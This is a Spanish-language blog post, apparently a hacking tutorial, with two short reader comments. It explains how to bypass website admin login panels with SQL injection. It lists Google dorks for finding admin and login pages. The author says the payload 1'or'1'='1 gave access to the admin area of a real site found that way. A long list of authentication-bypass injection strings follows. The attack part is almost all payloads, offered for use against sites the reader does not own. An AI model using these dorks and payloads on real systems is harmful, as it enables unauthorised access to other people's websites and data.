Bueno en el siguiente post, veremos como bypasear un Login Panel, con una simple consulta SQL, la cual omitirá la necesidad de contar con un nombre de usuario admin y la contraseña para entrar en el panel.
Empezaremos con unas cuantas DORKS para conseguir un par de Admin Panels;
Dorks:
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx
Y una consulta por ejemplo al Siguiente sitio web que obtuve con la Dork:
Password: 1'or'1'='1
y listo, acceso al area de administracion :D
Aqui otro tipo de consultas :
Consultas:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)
Saludos !
Gracias por este aporte!! Realmente me es de utilidad, siempre lo uso cuando necesito :)
ResponderEliminarSaludos, chicos!! (Si alguno de los míos ve esto)
bien -bykalakhd
ResponderEliminar